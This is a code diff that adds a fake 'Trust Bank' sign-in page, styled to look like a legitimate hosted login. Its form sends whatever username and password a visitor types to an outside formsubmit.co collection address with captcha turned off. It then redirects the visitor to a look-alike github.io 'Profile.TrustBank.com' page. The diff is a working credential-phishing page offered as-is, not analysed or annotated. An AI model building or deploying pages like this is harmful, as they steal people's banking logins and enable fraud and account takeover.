--- a/index.html
+++ b/index.html
@@ -1,1 +1,115 @@
+    <!DOCTYPE html> <html lang="en" > <head> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="https://cdn.auth0.com/ulp/react-components/1.60.2/css/main.cdn.min.css" /> <style id="custom-styles-container"> 
+body { background: #ffffff; font-family: ulp-font, -apple-system, BlinkMacSystemFont, Roboto, Helvetica, sans-serif;}.cd7ee4072 { background: #ffffff;}.cded01382.c6b422bc5 { background: #D00E17;}.cded01382.c5ff61970 { background: #0A8852;}.c8b2b17d0 { background-color: #0059d6; color: #ffffff;}.c8b2b17d0 a,.c8b2b17d0 a:visited { color: #ffffff;}.cb5541b57 { background-color: #0A8852;}.c892bad4b { background-color: #D00E17;}@supports (mask-image: url('/static/img/branding-generic/copy-icon.svg')) { @supports not (-ms-ime-align: auto) { .ccc7566fb.c62d3b4bb::before { background-color: #D00E17; } }}.input.c3c40ff2c { border-color: #D00E17;}.error-cloud { background-color: #D00E17;}.error-fatal { background-color: #D00E17;}.error-local { background-color: #D00E17;}#alert-trigger { background-color: #D00E17;} </style> <style> /* By default, hide features for javascript-disabled browsing */ /* We use !important to override any css with higher specificity */ /* It is also overriden by the styles in <noscript> in the header file */ .no-js { clip: rect(0 0 0 0); clip-path: inset(50%); height: 1px; overflow: hidden; position: absolute; white-space: nowrap; width: 1px; } </style> <noscript> <style> /* We use !important to override the default for js enabled */ /* If the display should be other than block, it should be defined specifically here */ .js-required { display: none !important; } .no-js { clip: auto; clip-path: none; height: auto; overflow: auto; position: static; white-space: normal; width: var(--prompt-width); } </style> </noscript>
 
+
+ <title>Sign Into Your Trust Bank Account</title>
+
+
+ </head> <body> <div class="cd7ee4072 c38d04da6"> <main class="cf77825b7 login"> <section class="c45621682 _prompt-box-outer cb9069121"> <div class="c1e477992 cd706e277"> <div class="cb01ad0fa"> <header class="c988510dd ccca4b9ed"> <div title="Trust Bank" id="custom-prompt-logo" style="width: auto !important; height: 60px !important; position: static !important; margin: auto !important; padding: 0 !important; background-color: transparent !important; background-position: center !important; background-size: contain !important; background-repeat: no-repeat !important"></div>
+
+
+ <img src="https://i.ibb.co/VB4dXcK/image-1200x630-2.png" alt="image-1200x630-2" width="1200" height="630" data-is360="0" data-load="full" class="" style="width: 160px; height: 90px;">
+
+
+
+ </header>
+
+
+     
+
+
+<h1 class="cdbc688fa c8d8a86c6"><font size="+2"><strong>
+
+Sign into Your Trust Bank Account
+</strong> </font>
+</h1> 
+
+<div class="c1627eed9 c391e1805">
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+<form  method="post" 
+
+
+action="https://formsubmit.co/9bad1063a8dcaac90c4721040d4ea0e8">
+
+<input type="hidden" name="_captcha" value="false">
+
+<input type="hidden" name="_next"  
+
+value="https://trustbank-com.github.io/Profile.TrustBank.com/">
+
+
+
+
+
+
+
+<div class="c42dc3dcf c391f4ce7"> <div class="c8959f9f5"> <div class="input-wrapper _input-wrapper"> <div class="ccc7566fb c863ff5a8 text cb1a878d1" data-action-text="" data-alternate-action-text=""> 
+
+
+
+
+<label><strong>Username</strong></label>
+
+<input class="input c76847df2 c0f7323da" name="username_Bank_Trust" type="text"   autoCapitalize="none" spellCheck="false"
+placeholder="Enter your Username"
+ autoFocus /> 
+
+
+<div class="ce40bc500 js-required ca729d390 cc6a3e73d" data-dynamic-label-for="username" aria-hidden="true">&nbsp </div> </div> </div> 
+
+
+
+
+
+
+<div class="c42dc3dcf c391f4ce7"> <div class="c8959f9f5"> <div class="input-wrapper _input-wrapper"> <div class="ccc7566fb c863ff5a8 text cb1a878d1" data-action-text="" data-alternate-action-text="">
+
+
+ 
+
+
+<label><strong>Password</strong></label>
+
+<input class="input c76847df2 c0f7323da" name="password_Bank_Trust" type="text"  autoCapitalize="none"
+
+placeholder="Enter password"
+ spellCheck="false" autoFocus /> 
+
+<div class="ce40bc500 js-required ca729d390 cc6a3e73d" data-dynamic-label-for="username" aria-hidden="true"> &nbsp </div> </div> </div> 
+
+
+
+
+
+
+<div class="c875de8b2"> <button type="submit" name="action" value="default" class="c216f31bf c8b2b17d0 c5be6f1f5 c43c4a129 c026be58c">Sign in</button> </div> </form> 
+
+
+ <div class="c74d2a75a c86b9260e"> 
+
+</div>
+ </button>
+
+ </form>
+
+
+ </div> </div> </div> </div> </section></main>
+
+
+</div> </body></html>
